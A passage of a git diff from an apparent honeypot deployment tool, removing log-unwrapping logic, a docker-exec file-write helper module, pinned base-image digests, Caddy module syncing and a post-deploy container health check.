# real MSGID lives in the body. Mirrors the unwrap logic in
|
||||
# ``decnet.collector.worker._INNER_RFC5424_RE`` — the two parsers
|
||||
# read the same on-wire format.
|
||||
_INNER_RFC5424_RE = re.compile(
|
||||
r"^(\d{4}-\d{2}-\d{2}T\S+)\s+" # 1: inner TIMESTAMP
|
||||
r"(\S+)\s+" # 2: inner HOSTNAME
|
||||
r"(\S+)\s+" # 3: inner APP-NAME
|
||||
r"\S+\s+" # PROCID (NIL or PID)
|
||||
r"(\S+)\s+" # 4: inner MSGID
|
||||
r"(.+)$", # 5: inner SD/MSG remainder
|
||||
)
|
||||
|
||||
# Structured data block: [relay@55555 k="v" ...]
|
||||
_SD_BLOCK_RE = re.compile(r'\[relay@55555\s+(.*?)\]', re.DOTALL)
|
||||
|
||||
@@ -136,21 +121,6 @@ def parse_line(line: str) -> LogEvent | None:
|
||||
|
||||
ts_raw, decky, service, event_type, sd_rest = m.groups()
|
||||
|
||||
# Unwrap double-wrapped Docker-stdout envelopes around bash
|
||||
# PROMPT_COMMAND lines. See ``_INNER_RFC5424_RE`` and the matching
|
||||
# logic in ``decnet.collector.worker.parse_rfc5424``. Must run
|
||||
# before the decky/service NIL-guard below — the OUTER decky is
|
||||
# the docker host, the inner header carries the real source.
|
||||
if event_type == "-" and sd_rest.startswith("-"):
|
||||
body = sd_rest[1:].lstrip()
|
||||
inner = _INNER_RFC5424_RE.match(body)
|
||||
if inner is not None:
|
||||
_i_ts, i_host, i_app, i_msgid, i_rest = inner.groups()
|
||||
decky = i_host
|
||||
service = i_app
|
||||
event_type = i_msgid
|
||||
sd_rest = i_rest
|
||||
|
||||
if decky == "-" or service == "-":
|
||||
return None
|
||||
|
||||
@@ -167,19 +137,6 @@ def parse_line(line: str) -> LogEvent | None:
|
||||
msg = tail.group(1).strip() if tail else ""
|
||||
attacker_ip = _extract_attacker_ip(fields, msg)
|
||||
|
||||
# Free-form bash PROMPT_COMMAND lines arrive with MSGID=NIL or MSGID=command
|
||||
# and a body like `CMD uid=0 user=root src=… pwd=… cmd=<rest of line>`.
|
||||
# Without this rewrite they're invisible to the behavioral profiler, which
|
||||
# filters on event_type ∈ {command, exec, query, …}. The Dockerfile logger
|
||||
# invocation uses --msgid command, so we must also handle the non-nil case.
|
||||
if event_type in ("-", "command") and msg.startswith("CMD ") and "command" not in fields:
|
||||
event_type = "command"
|
||||
head, sep, cmd_rest = msg[4:].partition("cmd=")
|
||||
for k, v in re.findall(r'(\w+)=(\S+)', head):
|
||||
fields.setdefault(k, v)
|
||||
if sep:
|
||||
fields.setdefault("command", cmd_rest)
|
||||
|
||||
# Mutator-emitted transitions arrive on the same ingest stream but
|
||||
# belong in the substrate-state index, not the per-IP attacker one.
|
||||
kind: EventKind = (
|
||||
|
||||
@@ -70,7 +70,7 @@ async def run_reuse_loop(
|
||||
wake_tasks.append(asyncio.create_task(
|
||||
_run_control_listener_signal(bus, "reuse-correlator"),
|
||||
))
|
||||
except Exception as exc:
|
||||
except Exception as exc: # noqa: BLE001
|
||||
log.warning(
|
||||
"reuse correlator: bus unavailable, running in poll-only mode: %s",
|
||||
exc,
|
||||
@@ -86,7 +86,7 @@ async def run_reuse_loop(
|
||||
results = await engine.correlate_credential_reuse(
|
||||
repo, min_targets=min_targets,
|
||||
)
|
||||
except Exception:
|
||||
except Exception: # noqa: BLE001
|
||||
log.exception("reuse correlator: tick failed")
|
||||
results = []
|
||||
|
||||
@@ -120,11 +120,11 @@ async def run_reuse_loop(
|
||||
t.cancel()
|
||||
if heartbeat_task is not None:
|
||||
heartbeat_task.cancel()
|
||||
for task in (*wake_tasks, heartbeat_task):
|
||||
if task is None:
|
||||
for t in (*wake_tasks, heartbeat_task):
|
||||
if t is None:
|
||||
continue
|
||||
with contextlib.suppress(asyncio.CancelledError, Exception):
|
||||
await task
|
||||
await t
|
||||
if bus is not None:
|
||||
with contextlib.suppress(Exception):
|
||||
await bus.close()
|
||||
@@ -143,7 +143,7 @@ async def _wake_on(bus: BaseBus, wake: asyncio.Event, pattern: str) -> None:
|
||||
wake.set()
|
||||
except asyncio.CancelledError:
|
||||
raise
|
||||
except Exception as exc:
|
||||
except Exception as exc: # noqa: BLE001
|
||||
log.warning(
|
||||
"reuse correlator: subscriber for %s died (%s); falling back to poll",
|
||||
pattern, exc,
|
||||
|
||||
@@ -1,39 +0,0 @@
|
||||
"""Shared primitives for writing/deleting files inside running deckies.
|
||||
|
||||
The canary planter and the orchestrator SSH driver both need to drop
|
||||
bytes into a decky container's filesystem, then sometimes unlink them.
|
||||
The ARG_MAX-safe ``base64 -d``-via-stdin trick lived in two places
|
||||
before this module existed.
|
||||
|
||||
Public API:
|
||||
|
||||
* :func:`write_file_to_container` — write bytes at a path, set mode,
|
||||
optionally backdate mtime.
|
||||
* :func:`delete_file_from_container` — best-effort ``rm -f``.
|
||||
* :func:`resolve_topology_container` — pick the right docker container
|
||||
for a MazeNET decky based on its services list.
|
||||
* :func:`resolve_decky_container` — async helper that takes
|
||||
``(decky_name, topology_id?)``, hydrates the topology when needed,
|
||||
and returns the docker container name.
|
||||
|
||||
Container resolution conventions are documented in
|
||||
:mod:`decnet.topology.compose`; we mirror them here without taking
|
||||
a runtime dependency on the compose generator.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
from .resolve import (
|
||||
resolve_decky_container,
|
||||
resolve_topology_container,
|
||||
)
|
||||
from .write import (
|
||||
delete_file_from_container,
|
||||
write_file_to_container,
|
||||
)
|
||||
|
||||
__all__ = [
|
||||
"delete_file_from_container",
|
||||
"resolve_decky_container",
|
||||
"resolve_topology_container",
|
||||
"write_file_to_container",
|
||||
]
|
||||
@@ -1,72 +0,0 @@
|
||||
"""Decky-name → docker container name resolution.
|
||||
|
||||
Two scopes:
|
||||
|
||||
* **Fleet**: every fleet decky has a ``ssh`` service container named
|
||||
``<decky_name>-ssh`` (see :mod:`decnet.services.ssh`). We always
|
||||
target it because it carries the most realistic filesystem layout.
|
||||
* **MazeNET (topology)**: same ``<name>-ssh`` convention when the
|
||||
decky exposes the ssh service; otherwise the decky's base container
|
||||
named ``decnet_t_<topology_id8>_<decky_name>`` (matches
|
||||
:func:`decnet.topology.compose._container_name`).
|
||||
|
||||
Keeping resolution centralised here means new ``docker exec`` callers
|
||||
(file drops, future bulk planters, etc.) never need to learn the
|
||||
naming conventions — they just call :func:`resolve_decky_container`.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
from typing import Any, Iterable, Optional
|
||||
|
||||
_SSH_CONTAINER_SUFFIX = "-ssh"
|
||||
|
||||
|
||||
def resolve_topology_container(
    topology_id: str, decky_name: str, services: Iterable[str],
) -> str:
    """Return the docker container name for a topology decky.

    When ``"ssh"`` is among *services* the name is
    ``<decky_name>-ssh``; otherwise it is
    ``decnet_t_<first 8 chars of topology_id>_<decky_name>``.
    Performs no I/O.
    """
    has_ssh = "ssh" in set(services)
    return (
        f"{decky_name}{_SSH_CONTAINER_SUFFIX}"
        if has_ssh
        else f"decnet_t_{topology_id[:8]}_{decky_name}"
    )
|
||||
|
||||
|
||||
async def resolve_decky_container(
    repo: Any,
    decky_name: str,
    *,
    topology_id: Optional[str] = None,
) -> str:
    """Resolve the docker container name for *decky_name*.

    Without a *topology_id* the result is always ``<decky_name>-ssh``
    and *repo* is not consulted.

    With a *topology_id* the topology is hydrated through
    ``decnet.topology.persistence.hydrate``; the first decky whose name
    (``decky_config["name"]``, falling back to ``name``) equals
    *decky_name* is selected and its ``services`` list is passed to
    :func:`resolve_topology_container`.

    Raises:
        LookupError: when *topology_id* is given but the topology does
            not exist or contains no decky with that name.
    """
    if topology_id is None:
        return f"{decky_name}{_SSH_CONTAINER_SUFFIX}"

    from decnet.topology.persistence import hydrate

    hydrated = await hydrate(repo, topology_id)
    if hydrated is None:
        raise LookupError(f"topology {topology_id!r} not found")

    def _name_of(decky) -> Any:
        # Prefer the configured name, fall back to the row-level name.
        return (decky.get("decky_config") or {}).get("name") or decky.get("name")

    match = next(
        (decky for decky in hydrated["deckies"] if _name_of(decky) == decky_name),
        None,
    )
    if match is None:
        raise LookupError(
            f"decky {decky_name!r} is not in topology {topology_id!r}"
        )
    return resolve_topology_container(
        topology_id, decky_name, match.get("services") or [],
    )
|
||||
@@ -1,124 +0,0 @@
|
||||
"""``docker exec``-driven file write/delete inside a decky container.
|
||||
|
||||
The write path streams a base64-encoded payload over stdin to
|
||||
``base64 -d`` inside the container, so binary content of any size up
|
||||
to docker's stream limits is safe — interpolating bytes into argv
|
||||
would trip ARG_MAX (~128 KB on most kernels) for any non-trivial blob.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import asyncio
|
||||
import base64
|
||||
import shlex
|
||||
from datetime import datetime, timezone
|
||||
from typing import Optional
|
||||
|
||||
from decnet.logging import get_logger
|
||||
|
||||
log = get_logger("decky_io.write")
|
||||
|
||||
_DOCKER = "docker"
|
||||
_DEFAULT_TIMEOUT = 8.0
|
||||
|
||||
|
||||
def _dirname(path: str) -> str:
|
||||
idx = path.rfind("/")
|
||||
if idx <= 0:
|
||||
return "/"
|
||||
return path[:idx]
|
||||
|
||||
|
||||
async def _kill_and_reap(proc: asyncio.subprocess.Process) -> None:
    """Kill *proc* and wait briefly for it to exit so its transport is released."""
    try:
        proc.kill()
    except ProcessLookupError:
        # Already gone; nothing left to kill.
        pass
    try:
        # Bounded: never let cleanup itself hang the caller.
        await asyncio.wait_for(proc.wait(), timeout=1.0)
    except asyncio.TimeoutError:
        pass


async def _run(
    argv: list[str],
    *,
    stdin_bytes: Optional[bytes] = None,
    timeout: float = _DEFAULT_TIMEOUT,
) -> tuple[int, str, str]:
    """Run *argv* as a subprocess and capture its output.

    Args:
        argv: Program and arguments, executed without a shell.
        stdin_bytes: Bytes written to the child's stdin; when ``None``
            no stdin pipe is opened.
        timeout: Seconds to wait for the process to finish.

    Returns:
        ``(returncode, stdout, stderr)`` with both streams decoded as
        UTF-8 (undecodable bytes replaced). Two synthetic results exist:
        ``(127, "", "argv[0] not found: …")`` when the executable is
        missing and ``(124, "", "timeout")`` when *timeout* elapses, in
        which case the child is killed and reaped before returning.
    """
    try:
        proc = await asyncio.create_subprocess_exec(
            *argv,
            stdin=asyncio.subprocess.PIPE if stdin_bytes is not None else None,
            stdout=asyncio.subprocess.PIPE,
            stderr=asyncio.subprocess.PIPE,
        )
    except FileNotFoundError as exc:
        return 127, "", f"argv[0] not found: {exc}"
    try:
        stdout, stderr = await asyncio.wait_for(
            proc.communicate(input=stdin_bytes), timeout=timeout,
        )
    except asyncio.TimeoutError:
        # Killing without waiting would leave the subprocess transport
        # and its pipes open until garbage collection.
        await _kill_and_reap(proc)
        return 124, "", "timeout"
    return (
        proc.returncode if proc.returncode is not None else -1,
        stdout.decode("utf-8", "replace"),
        stderr.decode("utf-8", "replace"),
    )
|
||||
|
||||
|
||||
async def write_file_to_container(
    container: str,
    path: str,
    content: bytes,
    *,
    mode: int = 0o644,
    mtime: Optional[datetime] = None,
    timeout: float = _DEFAULT_TIMEOUT,
) -> tuple[bool, Optional[str]]:
    """Write *content* to *path* inside *container* via ``docker exec``.

    The payload is base64-encoded and fed over stdin to a shell pipeline
    that creates the parent directory, decodes into *path*, applies
    *mode* with ``chmod`` and, when *mtime* is given, backdates the file
    with ``touch -d`` using the UTC rendering of *mtime*.

    Args:
        container: Docker container name.
        path: Destination path inside the container; an empty path is
            rejected without running anything.
        content: Raw bytes to write.
        mode: Permission bits passed to ``chmod`` (rendered in octal).
        mtime: Optional modification time to set.
        timeout: Seconds allowed for the ``docker exec`` call.

    Returns:
        ``(True, None)`` on exit code 0; otherwise ``(False, error)``
        where ``error`` is the stripped stderr capped at 256 characters,
        or ``"rc=<n>"`` when stderr is empty.
    """
    if not path:
        return False, "empty path"

    encoded = base64.b64encode(content)
    quoted_path = shlex.quote(path)
    steps = [
        f"mkdir -p {shlex.quote(_dirname(path))}",
        f"base64 -d > {quoted_path}",
        f"chmod {mode:o} {quoted_path}",
    ]
    if mtime is not None:
        stamp = mtime.astimezone(timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC")
        steps.append(f"touch -d {shlex.quote(stamp)} {quoted_path}")

    # ``&&`` chaining: the first failing step aborts the rest.
    argv = [_DOCKER, "exec", "-i", container, "sh", "-c", " && ".join(steps)]
    rc, _out, stderr = await _run(argv, stdin_bytes=encoded, timeout=timeout)
    if rc == 0:
        return True, None

    log.warning(
        "decky_io.write failed container=%s path=%s rc=%d stderr=%r",
        container, path, rc, stderr[:120],
    )
    return False, stderr.strip()[:256] or f"rc={rc}"
|
||||
|
||||
|
||||
async def delete_file_from_container(
    container: str,
    path: str,
    *,
    timeout: float = _DEFAULT_TIMEOUT,
) -> tuple[bool, Optional[str]]:
    """Run ``rm -f`` on *path* inside *container* via ``docker exec``.

    Args:
        container: Docker container name.
        path: Path inside the container; shell-quoted before use.
        timeout: Seconds allowed for the ``docker exec`` call.

    Returns:
        ``(True, None)`` when the command exits with 0; otherwise
        ``(False, error)`` where ``error`` is the stripped stderr capped
        at 256 characters, or ``"rc=<n>"`` when stderr is empty.
    """
    argv = [_DOCKER, "exec", container, "sh", "-c", f"rm -f {shlex.quote(path)}"]
    rc, _out, stderr = await _run(argv, timeout=timeout)
    if rc != 0:
        return False, stderr.strip()[:256] or f"rc={rc}"
    return True, None
|
||||
@@ -18,86 +18,69 @@ class DistroProfile:
|
||||
build_base: str # apt-compatible image for service Dockerfiles (FROM ${BASE_IMAGE})
|
||||
|
||||
|
||||
# Base images are pinned by digest (sha256) to make `docker pull`
|
||||
# reproducible — a registry-side rebuild of "debian:bookworm-slim"
|
||||
# can't silently swap content under us. The :tag is kept for human
|
||||
# readability; the @sha256 is what Docker actually resolves.
|
||||
# Refresh procedure: `docker pull <tag>` then `docker inspect
|
||||
# --format '{{index .RepoDigests 0}}' <tag>`. Last refreshed 2026-05-03.
|
||||
_DEBIAN_BOOKWORM = "debian:bookworm-slim@sha256:f9c6a2fd2ddbc23e336b6257a5245e31f996953ef06cd13a59fa0a1df2d5c252"
|
||||
_UBUNTU_22_04 = "ubuntu:22.04@sha256:962f6cadeae0ea6284001009daa4cc9a8c37e75d1f5191cf0eb83fe565b63dd7"
|
||||
_UBUNTU_20_04 = "ubuntu:20.04@sha256:8feb4d8ca5354def3d8fce243717141ce31e2c428701f6682bd2fafe15388214"
|
||||
_ROCKY_9 = "rockylinux:9-minimal@sha256:305de618a5681ff75b1d608fd22b10f362867dff2f550a4f1d427d21cd7f42b4"
|
||||
_CENTOS_7 = "centos:7@sha256:be65f488b7764ad3638f236b7b515b3678369a5124c47b8d32916d6487418ea4"
|
||||
_ALPINE_3_19 = "alpine:3.19@sha256:6baf43584bcb78f2e5847d1de515f23499913ac9f12bdf834811a3145eb11ca1"
|
||||
_FEDORA_39 = "fedora:39@sha256:d63d63fe593749a5e8dbc8152427d40bbe0ece53d884e00e5f3b44859efa5077"
|
||||
_KALI_ROLLING = "kalilinux/kali-rolling@sha256:1fd0364490011f245688c6ed9fee498a11cd779badfbb0b1d3a721d0f49f2d15"
|
||||
_ARCH_LATEST = "archlinux:latest@sha256:5ba8bb318666baef4d33afefc0e65db80f38b23503cb8e7b150d315cc2d4d5da"
|
||||
|
||||
|
||||
DISTROS: dict[str, DistroProfile] = {
|
||||
"debian": DistroProfile(
|
||||
slug="debian",
|
||||
image=_DEBIAN_BOOKWORM,
|
||||
image="debian:bookworm-slim",
|
||||
display_name="Debian 12 (Bookworm)",
|
||||
hostname_style="generic",
|
||||
build_base=_DEBIAN_BOOKWORM,
|
||||
build_base="debian:bookworm-slim",
|
||||
),
|
||||
"ubuntu22": DistroProfile(
|
||||
slug="ubuntu22",
|
||||
image=_UBUNTU_22_04,
|
||||
image="ubuntu:22.04",
|
||||
display_name="Ubuntu 22.04 LTS (Jammy)",
|
||||
hostname_style="generic",
|
||||
build_base=_UBUNTU_22_04,
|
||||
build_base="ubuntu:22.04",
|
||||
),
|
||||
"ubuntu20": DistroProfile(
|
||||
slug="ubuntu20",
|
||||
image=_UBUNTU_20_04,
|
||||
image="ubuntu:20.04",
|
||||
display_name="Ubuntu 20.04 LTS (Focal)",
|
||||
hostname_style="generic",
|
||||
build_base=_UBUNTU_20_04,
|
||||
build_base="ubuntu:20.04",
|
||||
),
|
||||
"rocky9": DistroProfile(
|
||||
slug="rocky9",
|
||||
image=_ROCKY_9,
|
||||
image="rockylinux:9-minimal",
|
||||
display_name="Rocky Linux 9",
|
||||
hostname_style="rhel",
|
||||
build_base=_DEBIAN_BOOKWORM, # Dockerfiles use apt-get; fall back to debian
|
||||
build_base="debian:bookworm-slim", # Dockerfiles use apt-get; fall back to debian
|
||||
),
|
||||
"centos7": DistroProfile(
|
||||
slug="centos7",
|
||||
image=_CENTOS_7,
|
||||
image="centos:7",
|
||||
display_name="CentOS 7",
|
||||
hostname_style="rhel",
|
||||
build_base=_DEBIAN_BOOKWORM, # Dockerfiles use apt-get; fall back to debian
|
||||
build_base="debian:bookworm-slim", # Dockerfiles use apt-get; fall back to debian
|
||||
),
|
||||
"alpine": DistroProfile(
|
||||
slug="alpine",
|
||||
image=_ALPINE_3_19,
|
||||
image="alpine:3.19",
|
||||
display_name="Alpine Linux 3.19",
|
||||
hostname_style="minimal",
|
||||
build_base=_DEBIAN_BOOKWORM, # Dockerfiles use apt-get; fall back to debian
|
||||
build_base="debian:bookworm-slim", # Dockerfiles use apt-get; fall back to debian
|
||||
),
|
||||
"fedora": DistroProfile(
|
||||
slug="fedora",
|
||||
image=_FEDORA_39,
|
||||
image="fedora:39",
|
||||
display_name="Fedora 39",
|
||||
hostname_style="rhel",
|
||||
build_base=_DEBIAN_BOOKWORM, # Dockerfiles use apt-get; fall back to debian
|
||||
build_base="debian:bookworm-slim", # Dockerfiles use apt-get; fall back to debian
|
||||
),
|
||||
"kali": DistroProfile(
|
||||
slug="kali",
|
||||
image=_KALI_ROLLING,
|
||||
image="kalilinux/kali-rolling",
|
||||
display_name="Kali Linux (Rolling)",
|
||||
hostname_style="rolling",
|
||||
build_base=_KALI_ROLLING, # Debian-based, apt-get compatible
|
||||
build_base="kalilinux/kali-rolling", # Debian-based, apt-get compatible
|
||||
),
|
||||
"arch": DistroProfile(
|
||||
slug="arch",
|
||||
image=_ARCH_LATEST,
|
||||
image="archlinux:latest",
|
||||
display_name="Arch Linux",
|
||||
hostname_style="rolling",
|
||||
build_base=_DEBIAN_BOOKWORM, # Dockerfiles use apt-get; fall back to debian
|
||||
build_base="debian:bookworm-slim", # Dockerfiles use apt-get; fall back to debian
|
||||
),
|
||||
}
|
||||
|
||||
|
||||
@@ -3,7 +3,6 @@ Deploy, teardown, and status via Docker SDK + subprocess docker compose.
|
||||
"""
|
||||
|
||||
import asyncio
|
||||
import json
|
||||
import shutil
|
||||
import subprocess # nosec B404
|
||||
import time
|
||||
@@ -58,8 +57,6 @@ _CANONICAL_AUTH_HELPER_DIR = Path(__file__).parent.parent / "templates" / "_shar
|
||||
_AUTH_HELPER_SERVICES = {"ssh", "telnet"}
|
||||
_CANONICAL_NTLMSSP = Path(__file__).parent.parent / "templates" / "_shared" / "ntlmssp.py"
|
||||
_NTLMSSP_SERVICES = {"smb", "rdp"}
|
||||
_CANONICAL_CADDY_MODULES_DIR = Path(__file__).parent.parent / "templates" / "_caddy_modules"
|
||||
_CADDY_SERVICES = {"http", "https"}
|
||||
|
||||
|
||||
def _sync_logging_helper(config: DecnetConfig) -> None:
|
||||
@@ -166,104 +163,6 @@ def _sync_sessrec_sources(config: DecnetConfig) -> None:
|
||||
shutil.copy2(src, dest)
|
||||
|
||||
|
||||
def _chown_tree(dest: Path, owner_ref: Path) -> None:
    """Give *dest*, and everything beneath it, the owner of *owner_ref*.

    Returns immediately unless the effective uid is 0. Ownership is applied
    with ``os.lchown`` (symlinks themselves are re-owned, not their targets)
    and a failure on one path is ignored so the remaining paths are still
    processed.
    """
    import os

    if os.geteuid() != 0:
        return
    reference = owner_ref.stat()
    paths = [dest]
    if dest.is_dir():
        # Include every descendant, not only direct children.
        paths.extend(dest.rglob("*"))
    for path in paths:
        try:
            os.lchown(path, reference.st_uid, reference.st_gid)
        except OSError:
            # Best-effort: keep going with the remaining paths.
            continue
|
||||
|
||||
|
||||
def _sync_caddy_modules(config: DecnetConfig) -> None:
    """Copy the canonical ``_caddy_modules`` tree into http/https build contexts.

    For every decky service named in ``_CADDY_SERVICES`` the service's
    Dockerfile context is looked up and, once per distinct context, each
    entry of ``_CANONICAL_CADDY_MODULES_DIR`` is copied into
    ``<context>/_caddy_modules``. Sub-directories are removed and re-copied
    wholesale; plain files are copied only when missing or when their bytes
    differ. Each copied entry is then re-owned to match the canonical
    directory. Does nothing when the canonical directory does not exist.
    """
    from decnet.services.registry import get_service

    canonical = _CANONICAL_CADDY_MODULES_DIR
    if not canonical.is_dir():
        return

    synced: set[Path] = set()
    caddy_service_names = (
        name
        for decky in config.deckies
        for name in decky.services
        if name in _CADDY_SERVICES
    )
    for name in caddy_service_names:
        service = get_service(name)
        context = None if service is None else service.dockerfile_context()
        if context is None or context in synced:
            continue
        synced.add(context)

        target_root = context / "_caddy_modules"
        target_root.mkdir(exist_ok=True)
        for entry in canonical.iterdir():
            mirrored = target_root / entry.name
            if entry.is_dir():
                # Replace the whole sub-tree rather than merging into it.
                if mirrored.exists():
                    shutil.rmtree(mirrored)
                shutil.copytree(entry, mirrored)
            elif not mirrored.exists() or mirrored.read_bytes() != entry.read_bytes():
                shutil.copy2(entry, mirrored)
            _chown_tree(mirrored, canonical)
|
||||
|
||||
|
||||
def _compose_ps(compose_file: Path) -> list[dict[str, object]]:
    """Return the rows of ``docker compose ps --all`` for *compose_file*.

    The command is run for project ``decnet`` with JSON output. Each stdout
    line is decoded on its own so one malformed line does not discard the
    others; a decoded object becomes one row and a decoded array contributes
    each of its object elements.

    Returns an empty list when the ``docker`` executable is not found, when
    the command exits non-zero, or when nothing parseable was printed.
    """
    try:
        proc = subprocess.run(  # nosec B603
            [
                "docker", "compose", "-p", "decnet", "-f", str(compose_file),
                "ps", "--all", "--format", "json",
            ],
            capture_output=True, text=True, check=False,
        )
    except FileNotFoundError:
        return []
    if proc.returncode != 0:
        return []

    parsed: list[dict[str, object]] = []
    for raw in (proc.stdout or "").splitlines():
        text = raw.strip()
        if not text:
            continue
        try:
            decoded = json.loads(text)
        except json.JSONDecodeError:
            continue
        # Normalise "one object" and "array of objects" to the same shape.
        candidates = decoded if isinstance(decoded, list) else [decoded]
        parsed.extend(item for item in candidates if isinstance(item, dict))
    return parsed
|
||||
|
||||
|
||||
def _compose(*args: str, compose_file: Path = COMPOSE_FILE, env: dict | None = None) -> None:
|
||||
import os
|
||||
# -p decnet pins the compose project name. Without it, docker compose
|
||||
@@ -494,8 +393,6 @@ def _compose_with_retry(
|
||||
console.print(f"[red]{result.stderr.strip()}[/]")
|
||||
log.error("docker compose %s failed after %d attempts: %s",
|
||||
" ".join(args), retries, result.stderr.strip())
|
||||
if last_exc is None: # pragma: no cover — retries=0 is not a supported call
|
||||
raise RuntimeError("_compose_with_retry exhausted retries without capturing an error")
|
||||
raise last_exc
|
||||
|
||||
|
||||
@@ -665,7 +562,6 @@ def deploy(config: DecnetConfig, dry_run: bool = False, no_cache: bool = False,
|
||||
_sync_sessrec_sources(config)
|
||||
_sync_auth_helper_sources(config)
|
||||
_sync_ntlmssp_sources(config)
|
||||
_sync_caddy_modules(config)
|
||||
|
||||
compose_path = write_compose(config, COMPOSE_FILE)
|
||||
console.print(f"[bold cyan]Compose file written[/] → {compose_path}")
|
||||
@@ -1055,84 +951,8 @@ async def deploy_topology(repo, topology_id: str, *, dry_run: bool = False) -> N
|
||||
)
|
||||
raise
|
||||
|
||||
# Post-deploy verification: ``compose up -d`` returns 0 the moment
|
||||
# containers are *started*, so a service that crashes on boot
|
||||
# (port bind failure, bad image, missing dependency) leaves the
|
||||
# topology row sitting at ACTIVE while half the substrate is dead.
|
||||
# Sample compose ps once and downgrade to DEGRADED if any expected
|
||||
# container isn't running — operators see real state instead of an
|
||||
# optimistic flag.
|
||||
ps_rows = await anyio.to_thread.run_sync(
|
||||
lambda: _compose_ps(compose_path),
|
||||
)
|
||||
bad: list[str] = []
|
||||
# Build the per-decky state map. The base container's compose
|
||||
# service name == decky name, which is what we cache on the
|
||||
# TopologyDecky row. Service containers (named ``<decky>-<svc>``)
|
||||
# don't gate the decky's state — service-level failures are visible
|
||||
# in compose ps separately and don't downgrade the decky as a whole.
|
||||
decky_state_by_name: dict[str, str] = {}
|
||||
for row in ps_rows:
|
||||
state = str(row.get("State", "")).lower()
|
||||
service_name = str(row.get("Service") or "")
|
||||
if service_name and "-" not in service_name:
|
||||
# Plain decky base; cache its docker state.
|
||||
decky_state_by_name[service_name] = state or "unknown"
|
||||
if state and state != "running":
|
||||
name = str(row.get("Name") or row.get("Service") or "?")
|
||||
exit_code = row.get("ExitCode")
|
||||
bad.append(
|
||||
f"{name}={state}"
|
||||
+ (f" (exit={exit_code})" if exit_code not in (None, 0, "") else "")
|
||||
)
|
||||
|
||||
# Reconcile each TopologyDecky.state from compose's view. Without
|
||||
# this, the row stays at the default 'pending' forever and the
|
||||
# dashboard's ACTIVE DECKIES count reads 0/N even when everything's
|
||||
# actually up.
|
||||
for decky in hydrated["deckies"]:
|
||||
cfg = decky.get("decky_config") or {}
|
||||
decky_name = cfg.get("name") or decky.get("name")
|
||||
if not decky_name:
|
||||
continue
|
||||
ds = decky_state_by_name.get(decky_name, "unknown")
|
||||
new_state = "running" if ds == "running" else "failed"
|
||||
try:
|
||||
await repo.update_topology_decky(
|
||||
decky["uuid"], {"state": new_state},
|
||||
)
|
||||
except Exception as exc: # noqa: BLE001
|
||||
log.warning(
|
||||
"post-deploy state reconcile failed topology=%s decky=%s: %s",
|
||||
topology_id, decky_name, exc,
|
||||
)
|
||||
|
||||
if bad:
|
||||
reason = "post-deploy check: " + ", ".join(bad[:8]) + (
|
||||
f" and {len(bad) - 8} more" if len(bad) > 8 else ""
|
||||
)
|
||||
await transition_status(
|
||||
repo, topology_id, TopologyStatus.DEGRADED, reason=reason,
|
||||
)
|
||||
log.warning(
|
||||
"topology %s deployed but %d container(s) unhealthy: %s",
|
||||
topology_id, len(bad), reason,
|
||||
)
|
||||
else:
|
||||
await transition_status(repo, topology_id, TopologyStatus.ACTIVE)
|
||||
log.info("topology %s deployed n_lans=%d", topology_id, len(lans))
|
||||
|
||||
# Best-effort canary baseline seed across every decky in the
|
||||
# topology. Same resilience contract as the fleet path: failures
|
||||
# surface as state=failed token rows, never abort the deploy.
|
||||
try:
|
||||
from decnet.canary import planter as _canary_planter
|
||||
await _canary_planter.seed_baseline_topology(repo, topology_id)
|
||||
except Exception as exc: # noqa: BLE001
|
||||
log.warning(
|
||||
"canary baseline seed failed (best-effort) topology=%s err=%s",
|
||||
topology_id, exc,
|
||||
)
|
||||
await transition_status(repo, topology_id, TopologyStatus.ACTIVE)
|
||||
log.info("topology %s deployed n_lans=%d", topology_id, len(lans))
|
||||
|
||||
|
||||
@_traced("engine.teardown_topology")
|
||||
|
||||
@@ -1,673 +0,0 @@
|
||||
"""Add/remove a single service on a deployed decky without full redeploy.
|
||||
|
||||
The ``_compose()`` wrapper in :mod:`decnet.engine.deployer` already
|
||||
supports per-service targeting (``up --no-deps -d <svc>``,
|
||||
``stop <svc>``, ``rm -f <svc>``). What was missing was the
|
||||
orchestration: regenerate the compose file (so future redeploys reflect
|
||||
the change), persist the new ``services`` list, and run the targeted
|
||||
compose command.
|
||||
|
||||
Two scopes:
|
||||
|
||||
* **Topology** — source of truth is the ``topology_deckies`` table; the
|
||||
compose file is per-topology (``decnet-topology-<id8>-compose.yml``).
|
||||
* **Fleet** — source of truth is ``decnet-state.json`` (with the
|
||||
``fleet_deckies`` table mirroring it); compose is the unihost
|
||||
``decnet-compose.yml``.
|
||||
|
||||
Both publish ``decky.<name>.service.added`` /
|
||||
``decky.<name>.service.removed`` on the bus. The new topic constants
|
||||
are documented in ``wiki-checkout/Service-Bus.md``.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import subprocess # nosec B404
|
||||
from pathlib import Path
|
||||
from typing import Any, Literal, Optional
|
||||
|
||||
import anyio
|
||||
|
||||
from decnet.bus import topics
|
||||
from decnet.logging import get_logger
|
||||
from decnet.services.base import BaseService
|
||||
from decnet.services.registry import get_service
|
||||
from decnet.topology.persistence import hydrate
|
||||
from decnet.web.db.repository import BaseRepository
|
||||
|
||||
# Heavy imports (composer/deployer pull in decnet.network → docker) are
|
||||
# deferred to call-sites via the ``_compose`` / ``_topology_compose_path``
|
||||
# / ``_load_state`` indirection helpers below. Mirrors the lazy-import
|
||||
# pattern in decnet.canary.planter for the same reason.
|
||||
|
||||
|
||||
def _compose(*args: str, compose_file: Optional[Path] = None, env=None) -> None:
    """Delegate to :func:`decnet.engine.deployer._compose` at call time.

    Kept as a module-level seam so tests can replace
    ``services_live._compose``. The deployer module is imported inside the
    function, and ``compose_file`` is forwarded only when the caller
    supplied one, leaving the deployer's own default in effect otherwise.
    """
    import decnet.engine.deployer as deployer_mod

    forwarded = {"env": env}
    if compose_file is not None:
        forwarded["compose_file"] = compose_file
    deployer_mod._compose(*args, **forwarded)
|
||||
|
||||
|
||||
def _topology_compose_path(topology_id: str) -> Path:
    """Return the deployer's compose-file path for *topology_id* (lazy import)."""
    import decnet.engine.deployer as deployer_mod

    return deployer_mod._topology_compose_path(topology_id)
|
||||
|
||||
|
||||
def _write_topology_compose(hydrated, path: Path) -> Path:
    """Render *hydrated* to *path* via ``decnet.topology.compose`` (lazy import)."""
    import decnet.topology.compose as topology_compose

